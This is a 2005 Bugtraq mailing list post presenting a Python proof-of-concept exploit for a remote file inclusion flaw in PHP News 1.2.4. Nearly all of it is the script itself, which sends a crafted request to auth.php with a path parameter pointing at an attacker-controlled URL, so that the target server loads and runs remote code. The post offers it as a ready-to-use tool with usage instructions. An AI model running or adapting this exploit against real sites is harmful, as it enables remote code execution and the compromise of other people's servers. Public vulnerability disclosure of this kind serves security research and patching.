Bugtraq mailing list archives
PHP News <= 1.2.4 - Remote File Inclusion Exploit
From: mozako <mozako () mybox it>
Date: Thu, 03 Mar 2005 23:24:31 +0000
[badroot security POC]: PHP News <= 1.2.4 - Remote File Inclusion Exploit =- Description -=A simple POC exploit for PHP News <= 1.2.4 remote file inclusion vulnerability discovered by Filip Groszynski.
=- Exploit -= #!/usr/bin/python# PHP News 1.2.4 remote file inclusion exploit # Coded by: mozako - mozako [at] mybox [dot] it # Vuln. Discovered by: Filip Groszynski # 3.3.2005 # # (C) 2005 badroot security
import urllib2 import sys __argv__ = sys.argv def usage():print "PHP News 1.2.4 remote file inclusion exploit \nby: mozako\n3.3.2005\n\nUsage:\n$ ./phpN.py -h http://123.4.5.6 -p /PHP_News_Path/ -u http://filetoupload"
sys.exit(-1) if len(__argv__) < 2: usage() try: global host global path global url host = __argv__[2] path = __argv__[4] url = __argv__[6] except IndexError: usage() def hack(): try: print "[X] Connecting...", urllib2.urlopen(host + path + "auth.php?path=" + url) print "[OK]" print "[X] Sending exploit...", "[OK]" print "[X] File sended !" except urllib2.HTTPError: print "[Failed]" except urllib2.httplib.InvalidURL: print "[Bad host]\nis there http:// ? :)" except ValueError: print "[Bad host]\nis there http:// ? :)" hack() # eof -- http://www.fatalimpulse.net
Current thread:
- PHP News <= 1.2.4 - Remote File Inclusion Exploit mozako (Mar 03)